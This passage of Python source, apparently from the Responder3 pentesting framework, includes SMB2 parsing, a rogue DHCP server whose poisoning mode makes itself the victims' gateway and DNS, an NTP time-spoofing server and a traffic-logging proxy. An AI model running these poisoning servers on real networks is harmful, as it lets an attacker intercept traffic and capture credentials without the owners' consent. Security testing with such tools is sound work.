
		self.Buffer = None

		if data is not None:
			self.parse(data)

	def parse(self, data):
		self.StructureSize   = int.from_bytes(data[:2], byteorder='little')
		assert self.StructureSize == 9
		if self.Dialect == NegotiateDialects.SMB311:
			self.Flags = SMB2TreeConnectRQFlag(int.from_bytes(data[2:4], byteorder = 'little'))
		else:
			self.Reserved = data[2:4]
		self.PathOffset = int.from_bytes(data[4:6], byteorder = 'little')
		self.PathLength = int.from_bytes(data[6:8], byteorder = 'little')

		if self.Dialect == NegotiateDialects.SMB311:
			self.Buffer = data[8:8+self.PathLength] 

		else:
			self.PathName = data[8:8+self.PathLength].decode('utf-16')

	def __repr__(self):
		t = '==== SMB2 TREE CONNECT REQ ====\r\n'
		t += 'StructureSize: %s\r\n' % self.StructureSize
		if self.Dialect == NegotiateDialects.SMB311:
			t += 'Flags: %s\r\n' % repr(self.Flags)
		else:
			t += 'Reserved: %s\r\n' % repr(self.Reserved)
		t += 'PathOffset: %s\r\n' % self.PathOffset
		t += 'PathLength: %s\r\n' % self.PathLength
		if self.Dialect == NegotiateDialects.SMB311:
			t += 'Buffer: %s\r\n' % self.Buffer
		else:
			t += 'PathName: %s\r\n' % repr(self.PathName)
		
		return t


class SMB2ShareType(enum.Enum):
	SMB2_SHARE_TYPE_DISK  = 0x01 #Physical disk share.
	SMB2_SHARE_TYPE_PIPE  = 0x02 #Named pipe share.
	SMB2_SHARE_TYPE_PRINT = 0x03 #Printer share.


class SMB2ShareFlags(enum.IntFlag):
	SMB2_SHAREFLAG_MANUAL_CACHING = 0x00000000 #The client can cache files that are explicitly selected by the user for offline use.
	SMB2_SHAREFLAG_AUTO_CACHING = 0x00000010 #The client can automatically cache files that are used by the user for offline access.
	SMB2_SHAREFLAG_VDO_CACHING = 0x00000020 #The client can automatically cache files that are used by the user for offline access and can use those files in an offline mode even if the share is available.
	SMB2_SHAREFLAG_NO_CACHING = 0x00000030 #Offline caching MUST NOT occur.
	SMB2_SHAREFLAG_DFS = 0x00000001 #The specified share is present in a Distributed File System (DFS) tree structure. The server SHOULD set the SMB2_SHAREFLAG_DFS bit in the ShareFlags field if the per-share property Share.IsDfs is TRUE.
	SMB2_SHAREFLAG_DFS_ROOT = 0x00000002 #The specified share is present in a DFS tree structure. The server SHOULD set the SMB2_SHAREFLAG_DFS_ROOT bit in the ShareFlags field if the per-share property Share.IsDfs is TRUE.
	SMB2_SHAREFLAG_RESTRICT_EXCLUSIVE_OPENS = 0x00000100#The specified share disallows exclusive file opens that deny reads to an open file.
	SMB2_SHAREFLAG_FORCE_SHARED_DELETE = 0x00000200#The specified share disallows clients from opening files on the share in an exclusive mode that prevents the file from being deleted until the client closes the file.
	SMB2_SHAREFLAG_ALLOW_NAMESPACE_CACHING = 0x00000400#The client MUST ignore this flag.
	SMB2_SHAREFLAG_ACCESS_BASED_DIRECTORY_ENUM = 0x00000800#The server will filter directory entries based on the access permissions of the client.
	SMB2_SHAREFLAG_FORCE_LEVELII_OPLOCK = 0x00001000#The server will not issue exclusive caching rights on this share.<27>
	SMB2_SHAREFLAG_ENABLE_HASH_V1 = 0x00002000#The share supports hash generation for branch cache retrieval of data. For more information, see section 2.2.31.2. This flag is not valid for the SMB 2.0.2 dialect.
	SMB2_SHAREFLAG_ENABLE_HASH_V2 = 0x00004000#The share supports v2 hash generation for branch cache retrieval of data. For more information, see section 2.2.31.2. This flag is not valid for the SMB 2.0.2 and SMB 2.1 dialects.
	SMB2_SHAREFLAG_ENCRYPT_DATA = 0x00008000#The server requires encryption of remote file access messages on this share, per the conditions specified in section 3.3.5.2.11. This flag is only valid for the SMB 3.x dialect family.
	SMB2_SHAREFLAG_IDENTITY_REMOTING = 0x00040000#The share supports identity remoting. The client can request remoted identity access for the share via the SMB2_REMOTED_IDENTITY_TREE_CONNECT context as specified in section 2.2.9.2.1.


class SMB2ShareCapabilities(enum.IntFlag):
	SMB2_SHARE_CAP_DFS = 0x00000008 #The specified share is present in a DFS tree structure. The server MUST set the SMB2_SHARE_CAP_DFS bit in the Capabilities field if the per-share property Share.IsDfs is TRUE.
	SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY = 0x00000010 #The specified share is continuously available. This flag is only valid for the SMB 3.x dialect family.
	SMB2_SHARE_CAP_SCALEOUT = 0x00000020#The specified share is present on a server configuration which facilitates faster recovery of durable handles. This flag is only valid for the SMB 3.x dialect family.
	SMB2_SHARE_CAP_CLUSTER = 0x00000040#The specified share is present on a server configuration which provides monitoring of the availability of share through the Witness service specified in [MS-SWN]. This flag is only valid for the SMB 3.x dialect family.
	SMB2_SHARE_CAP_ASYMMETRIC = 0x00000080#The specified share is present on a server configuration that allows dynamic changes in the ownership of the share. This flag is not valid for the SMB 2.0.2, 2.1, and 3.0 dialects.
	SMB2_SHARE_CAP_REDIRECT_TO_OWNER = 0x00000100#The specified share is present on a server configuration that supports synchronous share level redirection via a Share Redirect error context response (section 2.2.2.2.2). This flag is not valid for SMB 2.0.2, 2.1, 3.0, and 3.0.2 dialects.


# https://msdn.microsoft.com/en-us/library/cc246801.aspx
class DirectoryAccessMask(enum.IntFlag):
	FILE_LIST_DIRECTORY = 0x00000001 #This value indicates the right to enumerate the contents of the directory.
	FILE_ADD_FILE = 0x00000002 #This value indicates the right to create a file under the directory.
	FILE_ADD_SUBDIRECTORY = 0x00000004 #This value indicates the right to add a sub-directory under the directory.
	FILE_READ_EA = 0x00000008 #This value indicates the right to read the extended attributes of the directory.
	FILE_WRITE_EA = 0x00000010 #This value indicates the right to write or change the extended attributes of the directory.
	FILE_TRAVERSE = 0x00000020 #This value indicates the right to traverse this directory if the server enforces traversal checking.
	FILE_DELETE_CHILD = 0x00000040 #This value indicates the right to delete the files and directories within this directory.
	FILE_READ_ATTRIBUTES = 0x00000080 #This value indicates the right to read the attributes of the directory.
	FILE_WRITE_ATTRIBUTES = 0x00000100 #This value indicates the right to change the attributes of the directory.
	DELETE = 0x00010000 #This value indicates the right to delete the directory.
	READ_CONTROL = 0x00020000 #This value indicates the right to read the security descriptor for the directory.
	WRITE_DAC = 0x00040000 #This value indicates the right to change the DACL in the security descriptor for the directory. For the DACL data structure, see ACL in [MS-DTYP].
	WRITE_OWNER = 0x00080000#This value indicates the right to change the owner in the security descriptor for the directory.
	SYNCHRONIZE = 0x00100000 #SMB2 clients set this flag to any value.<43> SMB2 servers SHOULD<44> ignore this flag.
	ACCESS_SYSTEM_SECURITY = 0x01000000 #This value indicates the right to read or change the SACL in the security descriptor for the directory. For the SACL data structure, see ACL in [MS-DTYP].<45>
	MAXIMUM_ALLOWED = 0x02000000 #This value indicates that the client is requesting an open to the directory with the highest level of access the client has on this directory. If no access is granted for the client on this directory, the server MUST fail the open with STATUS_ACCESS_DENIED.
	GENERIC_ALL = 0x10000000 #This value indicates a request for all the access flags that are listed above except MAXIMUM_ALLOWED and ACCESS_SYSTEM_SECURITY.
	GENERIC_EXECUTE = 0x20000000 #This value indicates a request for the following access flags listed above: FILE_READ_ATTRIBUTES| FILE_TRAVERSE| SYNCHRONIZE| READ_CONTROL.
	GENERIC_WRITE = 0x40000000 #This value indicates a request for the following access flags listed above: FILE_ADD_FILE| FILE_ADD_SUBDIRECTORY| FILE_WRITE_ATTRIBUTES| FILE_WRITE_EA| SYNCHRONIZE| READ_CONTROL.
	GENERIC_READ = 0x80000000 #This value indicates a request for the following access flags listed above: FILE_LIST_DIRECTORY| FILE_READ_ATTRIBUTES| FILE_READ_EA| SYNCHRONIZE| READ_CONTROL.


# https://msdn.microsoft.com/en-us/library/cc246802.aspx
class FilePipePrinterAccessMask(enum.IntFlag):
	FILE_READ_DATA = 0x00000001 #This value indicates the right to read data from the file or named pipe.
	FILE_WRITE_DATA = 0x00000002 #This value indicates the right to write data into the file or named pipe beyond the end of the file.
	FILE_APPEND_DATA = 0x00000004 #This value indicates the right to append data into the file or named pipe.
	FILE_READ_EA = 0x00000008 #This value indicates the right to read the extended attributes of the file or named pipe.
	FILE_WRITE_EA = 0x00000010 #This value indicates the right to write or change the extended attributes to the file or named pipe.
	FILE_DELETE_CHILD = 0x00000040 # This value indicates the right to delete entries within a directory.
	FILE_EXECUTE = 0x00000020 #This value indicates the right to execute the file.
	FILE_READ_ATTRIBUTES = 0x00000080 #This value indicates the right to read the attributes of the file.
	FILE_WRITE_ATTRIBUTES = 0x00000100 #This value indicates the right to change the attributes of the file.
	DELETE = 0x00010000 #This value indicates the right to delete the file.
	READ_CONTROL = 0x00020000 #This value indicates the right to read the security descriptor for the file or named pipe.
	WRITE_DAC = 0x00040000 #This value indicates the right to change the discretionary access control list (DACL) in the security descriptor for the file or named pipe. For the DACL data structure, see ACL in [MS-DTYP].
	WRITE_OWNER = 0x00080000 #This value indicates the right to change the owner in the security descriptor for the file or named pipe.
	SYNCHRONIZE = 0x00100000 #SMB2 clients set this flag to any value.<40> SMB2 servers SHOULD<41> ignore this flag.
	ACCESS_SYSTEM_SECURITY = 0x01000000 #This value indicates the right to read or change the system access control list (SACL) in the security descriptor for the file or named pipe. For the SACL data structure, see ACL in [MS-DTYP].<42>
	MAXIMUM_ALLOWED = 0x02000000 #This value indicates that the client is requesting an open to the file with the highest level of access the client has on this file. If no access is granted for the client on this file, the server MUST fail the open with STATUS_ACCESS_DENIED.
	GENERIC_ALL = 0x10000000 #This value indicates a request for all the access flags that are previously listed except MAXIMUM_ALLOWED and ACCESS_SYSTEM_SECURITY.
	GENERIC_EXECUTE = 0x20000000 #This value indicates a request for the following combination of access flags listed above: FILE_READ_ATTRIBUTES| FILE_EXECUTE| SYNCHRONIZE| READ_CONTROL.
	GENERIC_WRITE = 0x40000000 #This value indicates a request for the following combination of access flags listed above: FILE_WRITE_DATA| FILE_APPEND_DATA| FILE_WRITE_ATTRIBUTES| FILE_WRITE_EA| SYNCHRONIZE| READ_CONTROL.
	GENERIC_READ = 0x80000000 #This value indicates a request for the following combination of access flags listed above: FILE_READ_DATA| FILE_READ_ATTRIBUTES| FILE_READ_EA| SYNCHRONIZE| READ_CONTROL.


# https://msdn.microsoft.com/en-us/library/cc246499.aspx
class TREE_CONNECT_REPLY:
	def __init__(self, data = None):
		self.StructureSize = None
		self.ShareType     = None
		self.Reserved      = None
		self.ShareFlags    = None
		self.Capabilities  = None
		self.MaximalAccess = None

		if data is not None:
			self.parse(data)

	def parse(self, data):
		self.StructureSize   = int.from_bytes(data[:2], byteorder='little')
		assert self.StructureSize == 16
		self.ShareType = SMB2ShareType(data[2])
		self.Reserved   = data[3]
		self.ShareFlags = SMB2ShareFlags(int.from_bytes(data[4:8],byteorder= 'little'))
		self.Capabilities = SMB2ShareCapabilities(int.from_bytes(data[8:12],byteorder = 'little'))
		
		##### TODO! somehow get the info wether we are accessing a file OR a directory OR a pipe OR a printer!!!
		temp_sharetype = 'file'
		if temp_sharetype == 'file':
			self.MaximalAccess = FilePipePrinterAccessMask(int.from_bytes(data[12:16],byteorder = 'little'))
		else:
			self.MaximalAccess = DirectoryAccessMask(int.from_bytes(data[12:16],byteorder = 'little'))

	def __repr__(self):
		t = '==== SMB2 TREE CONNECT REPLY ====\r\n'
		t += 'StructureSize: %s\r\n' % self.StructureSize
		t += 'ShareType: %s\r\n' % self.ShareType.name
		t += 'Reserved: %s\r\n' % self.Reserved
		t += 'ShareFlags: %s\r\n' % repr(self.ShareFlags)
		t += 'Capabilities: %s\r\n' % repr(self.Capabilities)
		t += 'MaximalAccess: %s\r\n' % self.MaximalAccess		
		return t



import os
import random
import socket
import struct
import logging
import asyncio
import ipaddress
import traceback

from responder3.core.sockets import setup_base_socket
from responder3.core.commons import PoisonerMode
from responder3.protocols.DHCP import * 
from responder3.core.servertemplate import ResponderServer, ResponderServerSession, ResponderServerGlobalSession

class DHCPResult:
	def __init__(self):
		self.offered_ip = None
		self.dhcp_server_ip = None
		self.client_mac = None
		self.options = None

	def from_dhcpmessage(msg):
		res = DHCPResult()
		res.offered_ip = msg.yiaddr
		res.dhcp_server_ip = msg.siaddr
		res.client_mac = msg.chaddr
		res.options = msg.options
		return res

	def __repr__(self):
		t = 'DHCP server on address %s offered an IP %s to the client with MAC address of %s' % (self.dhcp_server_ip, self.offered_ip, self.client_mac)
		return t

	def __str__(self):
		return repr(self)


class DHCPGlobalSession(ResponderServerGlobalSession):
	def __init__(self, listener_socket_config, settings, log_queue):
		ResponderServerGlobalSession.__init__(self, log_queue, self.__class__.__name__)
		self.listener_socket_config = listener_socket_config
		self.settings = settings
		self.sessions = {}
		self.assigned_ips = {} #xid - ip
		self.offer_mac = {}
		self.ip_pool  = None #ipaddress.IPv4Network

		self.parse_settings()

	def parse_settings(self):
		#default values
		#defaults
		self.serveraddress = self.listener_socket_config.bind_addr
		self.subnetmask    = 'FF:FF:FF:00'
		self.leasetime     = random.randint(600,1000)
		self.offer_options = None
		self.ack_options   = None
		self.ip_pool = None
		self.poisonermode = PoisonerMode.ANALYSE

		start = ipaddress.IPv4Address('192.168.1.100')
		end = ipaddress.IPv4Address('192.168.1.200')
		ipnet  = ipaddress.summarize_address_range(start, end)

		if 'ip_pool' in self.settings:
			# expected format: 192.168.1.100-200
			start = ipaddress.IPv4Address(self.settings['ip_pool'].split('-')[0].strip())
			m = self.settings['ip_pool'].rfind('.')
			end   = ipaddress.IPv4Address(self.settings['ip_pool'][:m+1] + self.settings['ip_pool'].split('-')[1].strip())
			ipnets = ipaddress.summarize_address_range(start, end)

			ips = []
			for ipnet in ipnets:
				for ip in ipnet:
					ips.append(ip)

			self.ip_pool = iter(ips)


		if self.settings is None:
			self.log('No settings defined, adjusting to Analysis functionality!')
			self.poisonermode = PoisonerMode.ANALYSE
		
		else:
			if 'mode' in self.settings:
				self.poisonermode = PoisonerMode(self.settings['mode'].upper())
			if 'subnetmask' in self.settings:
				self.subnetmask = self.settings['subnetmask']
			if 'leasetime' in self.settings:
				self.leasetime = self.settings['leasetime']
			if 'offer_options' in self.settings:
				if not isinstance(self.settings['offer_options'], list):
					raise Exception('A list of touples is expected for DHCPoptions')
				self.offer_options = []
				
				for code, data in self.settings['offer_options']:
					self.offer_options.append(OPTCode2ClassName[int(code)].from_setting(data))
			
			if 'ack_options' in self.settings:
				if not isinstance(self.settings['ack_options'], list):
					raise Exception('A list of touples is expected for DHCPoptions')
				self.ack_options = []
				
				for code, data in self.settings['ack_options']:
					self.ack_options.append(OPTCode2ClassName[int(code)].from_setting(data))


class DHCPSession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)


class DHCP(ResponderServer):
	@staticmethod
	def custom_socket(socket_config):
		if socket_config.bind_family == 6:
			raise Exception('DHCP server should not be run on IPv6 (requires a different protocol)')
		sock = setup_base_socket(socket_config)
		sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
		sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 0) #important to turn off reuse address (at least on windows!!!)
		return sock

	def init(self):
		self.parser = DHCPMessage
		
	async def parse_message(self):
		msg = await asyncio.wait_for(self.parser.from_streamreader(self.creader), timeout=1)
		return msg

	async def send_data(self, data, addr = None):
		self.cwriter.write(data)
		return
		
	async def send_broadcast(self, data, addr):
		self.cwriter.write_broadcast(data, addr)
		return

	async def run(self):
		try:
			msg = await asyncio.wait_for(self.parse_message(), timeout=1)		
			
			if self.globalsession.poisonermode == PoisonerMode.ANALYSE:
				for opt in msg.options:
						if isinstance(opt, DHCPOptHOSTNAME) == True:
							await self.log('DHCP device hostname: %s' % opt.hostname)

				if msg.dhcpmessagetype == DHCPOptMessageType.DHCPACK:
					result = DHCPResult.from_dhcpmessage(msg)
					await self.log(str(result))
					return

			else:
				if msg.xid not in self.globalsession.sessions:
					self.globalsession.sessions[msg.xid] = []
				
				self.globalsession.sessions[msg.xid].append(msg)

				if self.globalsession.sessions[msg.xid][-1].dhcpmessagetype == DHCPOptMessageType.DHCPDISCOVER:
					#if self.globalsession.sessions[msg.xid][-1].chaddr in self.globalsession.offer_mac:
					#	return
					#this should be the first message for this transactionID
					#if len(self.globalsession.sessions[msg.xid]) > 2:
					#	raise Exception('TID collision?')

					options = []
					options.append(DHCPOptDHCPMESSAGETYPE.construct(DHCPOptMessageType.DHCPOFFER))
					options.append(DHCPOptSERVERIDENTIFIER.construct(self.globalsession.serveraddress))
					options.append(DHCPOptIPADDRESSLEASETIME.construct(self.globalsession.leasetime))
					options.append(DHCPOptRENEVALTIME.construct(60))
					options.append(DHCPOptREBINDINGTIME.construct(60))
					options.append(DHCPOptSUBNETMASK.construct(self.globalsession.subnetmask))
					options.append(DHCPOptROUTERS.construct(self.globalsession.serveraddress))
					options.append(DHCPOptDNSSERVERS.construct(self.globalsession.serveraddress))
					if self.globalsession.offer_options is not None:
						options += self.globalsession.offer_options
					options.append(DHCPOptEND.construct())
					offered_ip = None
					if msg.xid in self.globalsession.assigned_ips:
						offered_ip = self.globalsession.assigned_ips[msg.xid]
					else:
						offered_ip = next(self.globalsession.ip_pool)
					dhcpoffer  = DHCPMessage.construct(self.globalsession.sessions[msg.xid][-1].xid, 
						DHCPOpcode.BOOTREPLY, 
						options, 
						yiaddr = offered_ip,
						siaddr = self.globalsession.serveraddress, 
						macaddress = self.globalsession.sessions[msg.xid][-1].chaddr, 
						flags = self.globalsession.sessions[msg.xid][-1].flags,
						secs =self.globalsession.sessions[msg.xid][-1].secs)

					self.globalsession.assigned_ips[msg.xid] = offered_ip
					self.globalsession.offer_mac[self.globalsession.sessions[msg.xid][-1].chaddr] = 0

					await self.send_broadcast(dhcpoffer.to_bytes()[:300], ('255.255.255.255', 68))

				elif self.globalsession.sessions[msg.xid][-1].dhcpmessagetype == DHCPOptMessageType.DHCPREQUEST:

					if msg.xid in self.globalsession.assigned_ips:
						#ip offer already sent via DHCPOFFER
						options = []
						options.append(DHCPOptDHCPMESSAGETYPE.construct(DHCPOptMessageType.DHCPACK))
						options.append(DHCPOptSERVERIDENTIFIER.construct(self.globalsession.serveraddress))
						options.append(DHCPOptIPADDRESSLEASETIME.construct(self.globalsession.leasetime))
						options.append(DHCPOptSUBNETMASK.construct(self.globalsession.subnetmask))

						options.append(DHCPOptRENEVALTIME.construct(60))
						options.append(DHCPOptREBINDINGTIME.construct(60))
						options.append(DHCPOptROUTERS.construct(self.globalsession.serveraddress))
						options.append(DHCPOptDNSSERVERS.construct(self.globalsession.serveraddress))
						if self.globalsession.ack_options is not None:
							options += self.globalsession.ack_options
						options.append(DHCPOptEND.construct())
						dhcpack = DHCPMessage.construct(
							self.globalsession.sessions[msg.xid][-1].xid, 
							DHCPOpcode.BOOTREPLY, 
							options, 
							yiaddr = self.globalsession.assigned_ips[msg.xid],
							siaddr = self.globalsession.serveraddress, 
							macaddress = self.globalsession.sessions[msg.xid][-1].chaddr)

						await self.logger.info('Sending ACK to %s' % str(self.globalsession.assigned_ips[msg.xid]))

						if self.globalsession.sessions[msg.xid][-1].flags & DHCPFlags.B == 0 and self.cwriter.peer_address[0] != '0.0.0.0':
							await self.send_data(dhcpack.to_bytes(), (str(self.globalsession.assigned_ips[msg.xid]), 68))
						else:
							await self.send_broadcast(dhcpack.to_bytes(), ('255.255.255.255', 68))
						

					else:
						#a client tries to renew his already existing IP
						#print('a client tries to renew his already existing IP')
						requested_ip = None
						for option in msg.options:
							if option.code == 50:
								requested_ip = option.address
								print('NAK-ing client-requested IP %s' % requested_ip)
								options = [DHCPOptDHCPMESSAGETYPE.construct(DHCPOptMessageType.DHCPNAK)]
								options.append(DHCPOptEND.construct())
								dhcpnak = DHCPMessage.construct(
									self.globalsession.sessions[msg.xid][-1].xid, 
									DHCPOpcode.BOOTREPLY, 
									options, 
									siaddr = self.globalsession.serveraddress, 
									macaddress = self.globalsession.sessions[msg.xid][-1].chaddr)
								
								await self.send_broadcast(dhcpnak.to_bytes(), ('255.255.255.255', 68))
						
						if requested_ip is None:
							#
							# Disclaimer: I half-assed this part.
							# 
							#
							self.globalsession.assigned_ips[msg.xid] = ipaddress.ip_address(self.cwriter.peer_address[0])
							options = []
							options.append(DHCPOptDHCPMESSAGETYPE.construct(DHCPOptMessageType.DHCPACK))
							options.append(DHCPOptSERVERIDENTIFIER.construct(self.globalsession.serveraddress))
							options.append(DHCPOptIPADDRESSLEASETIME.construct(self.globalsession.leasetime))
							options.append(DHCPOptRENEVALTIME.construct(60))
							options.append(DHCPOptREBINDINGTIME.construct(60))
							options.append(DHCPOptSUBNETMASK.construct(self.globalsession.subnetmask))
							options.append(DHCPOptROUTERS.construct(self.globalsession.serveraddress))
							options.append(DHCPOptDNSSERVERS.construct(self.globalsession.serveraddress))
							for o in msg.options:
								if o.code in [53, 55]:
									continue
								options.append(o)
							if self.globalsession.ack_options is not None:
								options += self.globalsession.ack_options
							options.append(DHCPOptEND.construct())
							dhcpack = DHCPMessage.construct(
								self.globalsession.sessions[msg.xid][-1].xid, 
								DHCPOpcode.BOOTREPLY, 
								options,
								yiaddr = self.globalsession.assigned_ips[msg.xid],
								siaddr = self.globalsession.serveraddress, 
								macaddress = self.globalsession.sessions[msg.xid][-1].chaddr)

							await self.logger.info('Sending ACK to %s' % str(self.globalsession.assigned_ips[msg.xid]))

							await self.send_data(dhcpack.to_bytes(), (str(self.globalsession.assigned_ips[msg.xid]), 68))
		

		except Exception as e:
			raise e





import logging
import asyncio
import traceback
import ipaddress
import datetime

from responder3.core.logging.logger import *
from responder3.core.asyncio_helpers import R3ConnectionClosed
from responder3.core.commons import *
from responder3.protocols.NTP import * 
from responder3.core.servertemplate import ResponderServer, ResponderServerSession, ResponderServerGlobalSession


class NTPGlobalSession(ResponderServerGlobalSession):
	def __init__(self, listener_socket_config, settings, log_queue):
		ResponderServerGlobalSession.__init__(self, log_queue, self.__class__.__name__)
		self.listener_socket_config = listener_socket_config
		self.settings = settings

		self.refid = ipaddress.IPv4Address('127.0.0.1')
		self.faketime = datetime.datetime.now()

		if self.settings:
			self.parse_settings()
			return
		self.set_default_settings()

	def set_default_settings(self):
		self.refid = ipaddress.IPv4Address('127.0.0.1')
		self.faketime = datetime.datetime.now()

	def parse_settings(self):
		fmt = '%b %d %Y %H:%M'
		if 'refid' in self.settings:
			self.refid = ipaddress.ip_address(self.settings['refid'])

		if 'faketime' in self.settings:			
			if 'timefmt' in self.settings:
				fmt = self.settings['timefmt']
			
			self.faketime = datetime.datetime.strptime(self.settings['faketime'], fmt)


class NTPSession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)
		self.parser = NTPPacket


class NTP(ResponderServer):
	def init(self):
		pass
		
	async def send_data(self, data):
		self.cwriter.write(data)
		#await asyncio.wait_for(, timeout=1)
		return

	@r3trafficlogexception
	async def run(self):
		try:
			result = await asyncio.gather(*[asyncio.wait_for(self.session.parser.from_streamreader(self.creader), timeout=None)], return_exceptions=True)
		except asyncio.CancelledError as e:
			raise e
		if isinstance(result[0], R3ConnectionClosed):
			return
		elif isinstance(result[0], Exception):
			raise result[0]
		else:
			msg = result[0]

		await self.logger.info('Time request in! Spoofing time to %s' % (self.globalsession.faketime.isoformat()))
		response = NTPPacket.construct_fake_reply(msg.TransmitTimestamp, self.globalsession.faketime, self.globalsession.refid)
			
		await asyncio.wait_for(self.send_data(response.to_bytes()), timeout=1)


#TODO: not yet supporting the new framework!!!
import logging
import asyncio

from responder3.core.logging.logger import *
from responder3.core.logging.log_objects import ProxyDataType
from responder3.core.udpwrapper import UDPClient
from responder3.core.servertemplate import ResponderServer, ResponderServerSession
from responder3.core.asyncio_helpers import *
from responder3.core.ssl import *
from responder3.core.sockets import *


class GenericProxySession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)


class GenericProxy(ResponderServer):
	def init(self):
		self.proxy_reader = None
		self.proxy_writer = None
		self.proxy_closed = asyncio.Event()
		self.proxy_sslctx = None

		#defaults
		self.timeout = None
		self.read_size = 65536
		#parse settings
		if self.settings is None:
			raise Exception('settings MUST be defined!')
		if 'remote_host' not in self.settings:
			raise Exception('remote_host MUST be defined!')
		if 'remote_port' not in self.settings:
			raise Exception('remote_port MUST be defined!')

		if 'remote_sslctx' in self.settings:
			self.proxy_sslctx = SSLContextBuilder.from_dict(self.settings['remote_sslctx'])
	
		if 'timeout' in self.settings:
			self.timeout = int(self.settings['timeout'])
			if self.timeout == -1:
				self.timeout = None

		self.remote_host = self.settings['remote_host']
		self.remote_port = int(self.settings['remote_port'])

	async def modify_data(self, data):
		return data

	@r3trafficlogexception
	async def proxy_forwarder(self, reader, writer, laddr, raddr):
		while not self.proxy_closed.is_set():
			try:
				data = await asyncio.wait_for(reader.read(self.read_size), timeout=self.timeout)
				print(data)
			except asyncio.TimeoutError:
				await self.logger.debug('Timeout!')
				self.proxy_closed.set()
				writer.close()
				break
			except Exception as e:
				await self.logger.error('proxy_forwarder exception: %s' % e)
				self.proxy_closed.set()
				writer.close()
				break
				
			
			if data == b'' or reader.at_eof():
				print('Connection closed!')
				self.proxy_closed.set()
				break

			await self.logger.proxy(data, laddr, raddr)
			await self.logger.proxydata(data, laddr, raddr, self.proxy_sslctx is None, ProxyDataType.BINARY)
			modified_data = await self.modify_data(data)
			if modified_data != data:
				await self.logger.proxy(data, laddr, raddr)
			
			try:
				writer.write(modified_data)
				await asyncio.wait_for(writer.drain(), timeout=self.timeout)
			except asyncio.TimeoutError:
				await self.logger.debug('Timeout!')
				self.proxy_closed.set()
				writer.close()
				break
			except Exception as e:
				await self.logger.error('proxy_forwarder 2 exception: %s' % e)
				self.proxy_closed.set()
				writer.close()
				break

		return
	
	@r3trafficlogexception
	async def udp_proxy(self):
		laddr = (self.creader._addr[0], self.creader._addr[1])
		raddr = (self.remote_host, self.remote_port)
		data = await self.creader.read()
		
		await self.logger.proxy(data, laddr, raddr)
		
		client = UDPClient((self.remote_host, self.remote_port))
		self.proxy_reader, self.proxy_writer = await asyncio.wait_for(client.run(data), timeout=self.timeout)
		
		response_data = await self.proxy_reader.read()
		
		await self.logger.proxy(data, raddr, laddr)
		self.cwriter.write(response_data)
		return
	
	@r3trafficlogexception
	async def run(self):
		await self.logger.debug('Starting task!')
		await self.logger.debug('Setting up remote connection!')
		loop = asyncio.get_event_loop()
		
		if self.listener_socket_config.bind_protocol == socket.SOCK_STREAM:
			self.proxy_reader, self.proxy_writer = await asyncio.wait_for(asyncio.open_connection(host=self.remote_host,port = self.remote_port, ssl=self.proxy_sslctx), timeout=self.timeout)
			await self.logger.debug('Connected!')
			asyncio.ensure_future(self.proxy_forwarder(self.proxy_reader, self.cwriter, (self.remote_host,int(self.remote_port)), self.caddr))
			asyncio.ensure_future(self.proxy_forwarder(self.creader, self.proxy_writer, self.caddr, (self.remote_host,int(self.remote_port))))
			
			await self.proxy_closed.wait()

		else:
			loop.create_task(self.udp_proxy())



import ipaddress
import socket
import sys

from responder3.core.commons import ResponderPlatform, get_platform


class SocketConfig:
	def __init__(self):
		"""
		Holds all necessary information to create a listening socket
		"""

		self.bind_iface  = None
		self.bind_port   = None
		self.bind_family = None
		self.bind_protocol = None
		self.bind_addr = None
		self.bind_iface_idx = None
		self.reuse_address = True
		self.reuse_port = True
		self.is_ssl_wrapped = False
		self.is_server = True
		self.platform = get_platform()

	def to_dict(self):
		t = {}
		t['bind_iface'] = self.bind_iface
		t['bind_port'] = self.bind_port
		t['bind_family'] = self.bind_family
		t['bind_protocol'] = self.bind_protocol
		t['bind_iface_idx'] = self.bind_iface_idx
		t['reuse_address'] = self.reuse_address
		t['reuse_port'] = self.reuse_port
		t['is_ssl_wrapped'] = self.is_ssl_wrapped
		t['is_server'] = self.is_server
		return t

	def to_json(self):
		return json.dumps(self.to_dict())

	def get_protocolname(self):
		"""
		Returns protocol type as string
		:return: str
		"""
		if self.bind_protocol == socket.SOCK_STREAM:
			return 'TCP'
		elif self.bind_protocol == socket.SOCK_DGRAM:
			return 'UDP'
		else:
			return 'UNKNOWN'

	def get_address(self):
		"""
		Resturns address as tuple
		:return: tuple
		"""
		return (str(self.bind_addr), self.bind_port)

	def get_print_address(self):
		"""
		Returns address in a printable form
		:return: str
		"""
		return '%s:%d' % (str(self.bind_addr), self.bind_port)

	def get_server_kwargs(self):
		"""
		Returns a dict to be used in asyncio.create_server function
		:return: dict
		"""
		return {
			'host'         : str(self.bind_addr),
			'port'         : self.bind_port,
			'family'       : self.bind_family,
			'reuse_address': self.reuse_address,
			'reuse_port'   : self.reuse_port
		}

	def __repr__(self):
		return str(self)

	def __str__(self):
		t  = '==SocketConfig==\r\n'
		t += 'Interface: %s\r\n' % self.bind_iface
		t += 'Iface idx: %s\r\n' % self.bind_iface_idx
		t += 'Address  : %s\r\n' % str(self.bind_addr)
		t += 'Port     : %s\r\n' % self.bind_port
		t += 'Protocol : %s\r\n' % self.bind_protocol
		t += 'Family   : %s\r\n' % self.bind_family
		return t


def setup_base_socket(socket_config, bind_ip_override = None):
	"""
	This function provides a platform-independent way to create a socket based on the socket configuration
	:param socket_config: Socket configuration object
	:type socket_config: SocketConfig
	:param bind_ip_override: Used to override the bind_addr value of the socket configuration,
							and creates the socket with the overridden value
	:return: socket.socket
	"""
	try:
		sock = None
		if socket_config.bind_protocol == socket.SOCK_DGRAM:
			if socket_config.bind_family == 4:
				sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
				if socket_config.platform == ResponderPlatform.LINUX:
					if socket_config.reuse_address:
						sock.setsockopt(socket.SOL_SOCKET, 25, socket_config.bind_iface.encode())
					if socket_config.reuse_port:
						sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
				sock.setblocking(False)
				sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
